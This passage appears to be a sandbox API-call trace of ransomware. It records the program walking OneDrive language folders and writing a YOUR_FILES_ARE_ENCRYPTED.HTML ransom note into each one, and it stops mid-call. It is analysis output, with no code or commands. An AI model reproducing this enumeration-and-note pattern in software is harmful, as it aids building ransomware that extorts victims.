(in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabfb35f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabfb35f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabfb35f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.870] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tk-tm\\FileSync.LocalizedResources.dll.mui") returned 113 [0162.870] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.870] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.870] lstrlenW (lpString=".mui") returned 4 [0162.870] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.870] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabfb35f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xabfb35f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xabfb35f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.870] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.870] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tk-tm\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0162.870] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tk-tm\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\tk-tm\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.871] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.873] CloseHandle (hObject=0x5ac) returned 1 [0162.873] GetProcessHeap () returned 0x270000 [0162.874] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.874] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabfb35f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac10a250, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac10a250, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="tn-za", cAlternateFileName="")) returned 1 [0162.874] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tn-za") returned 77 [0162.874] GetProcessHeap () returned 0x270000 [0162.874] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.874] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tn-za" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tn-za") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tn-za" [0162.874] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tn-za", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tn-za\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tn-za\\*" [0162.874] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tn-za\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabfb35f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac10a250, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac10a250, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.875] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xabfb35f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac10a250, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac10a250, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.875] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac10a250, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac10a250, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac10a250, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x144b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.875] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tn-za\\FileSync.LocalizedResources.dll.mui") returned 113 [0162.875] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.875] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.875] lstrlenW (lpString=".mui") returned 4 [0162.875] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.875] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac10a250, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac10a250, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac10a250, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x144b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.875] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.875] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tn-za\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0162.875] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tn-za\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\tn-za\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.876] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.878] CloseHandle (hObject=0x5ac) returned 1 [0162.878] GetProcessHeap () returned 0x270000 [0162.879] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.879] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac10a250, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac23ad50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac23ad50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="tr", cAlternateFileName="")) returned 1 [0162.879] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tr") returned 74 [0162.879] GetProcessHeap () returned 0x270000 [0162.879] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.879] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tr" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tr") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tr" [0162.879] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tr", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tr\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tr\\*" [0162.879] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tr\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac10a250, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac23ad50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac23ad50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.880] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac10a250, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac23ad50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac23ad50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.880] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac23ad50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac23ad50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac23ad50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x128a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.880] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tr\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.881] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.881] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.881] lstrlenW (lpString=".mui") returned 4 [0162.881] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.881] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac23ad50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac23ad50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac23ad50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x128a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.881] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.881] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tr\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.881] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tr\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\tr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.881] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.883] CloseHandle (hObject=0x5ac) returned 1 [0162.884] GetProcessHeap () returned 0x270000 [0162.885] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.885] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac23ad50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac36b850, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac36b850, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="tt", cAlternateFileName="")) returned 1 [0162.885] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tt") returned 74 [0162.885] GetProcessHeap () returned 0x270000 [0162.885] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.885] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tt" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tt") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tt" [0162.885] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tt", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tt\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tt\\*" [0162.885] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tt\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac23ad50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac36b850, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac36b850, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.885] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac23ad50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac36b850, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac36b850, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.885] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac36b850, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac36b850, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac36b850, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.885] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tt\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.885] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.886] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.886] lstrlenW (lpString=".mui") returned 4 [0162.886] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.886] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac36b850, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac36b850, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac36b850, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.886] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.886] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tt\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.886] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\tt\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\tt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.886] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.890] CloseHandle (hObject=0x5ac) returned 1 [0162.890] GetProcessHeap () returned 0x270000 [0162.891] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.891] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac36b850, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac49c350, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac49c350, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ug", cAlternateFileName="")) returned 1 [0162.891] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug") returned 74 [0162.891] GetProcessHeap () returned 0x270000 [0162.891] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.891] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug" [0162.891] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug\\*" [0162.891] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac36b850, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac49c350, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac49c350, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.892] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xac36b850, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac49c350, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac49c350, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.892] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac49c350, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac49c350, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac49c350, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x128b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.892] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.893] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.893] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.893] lstrlenW (lpString=".mui") returned 4 [0162.893] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.893] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac49c350, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xac49c350, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac49c350, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x128b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.893] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.893] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ug\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.893] CreateFileW 